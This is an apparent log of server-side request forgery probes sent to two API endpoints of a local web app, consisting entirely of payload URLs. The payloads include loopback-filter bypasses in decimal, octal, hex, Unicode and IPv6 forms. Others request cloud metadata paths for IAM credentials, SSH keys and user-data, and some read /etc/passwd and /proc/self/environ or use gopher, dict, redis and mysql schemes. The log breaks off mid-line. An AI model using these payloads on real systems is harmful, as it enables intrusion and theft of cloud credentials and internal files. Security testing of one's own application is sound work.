`http://localhost:4200/api/tii_actions?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_actions?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_actions?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_actions?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=0%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_actions?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_actions?url=0` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_actions?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_actions?url=7F000001` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433` +- Testing: `http://localhost:4200/api/tii_actions?url=6425673729` +- Testing: `http://localhost:4200/api/tii_actions?url=127001` +- Testing: `http://localhost:4200/api/tii_actions?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_actions?url=017700000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_actions?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_actions?url=2852039166` +- Testing: `http://localhost:4200/api/tii_actions?url=7147006462` +- Testing: `http://localhost:4200/api/tii_actions?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_actions?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_actions?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_actions?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_actions?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_actions?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_actions?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777` +- Testing: `http://localhost:4200/api/tii_actions?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=instance-data` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_actions?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_actions?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_actions?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=0%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_eula +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_eula?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: 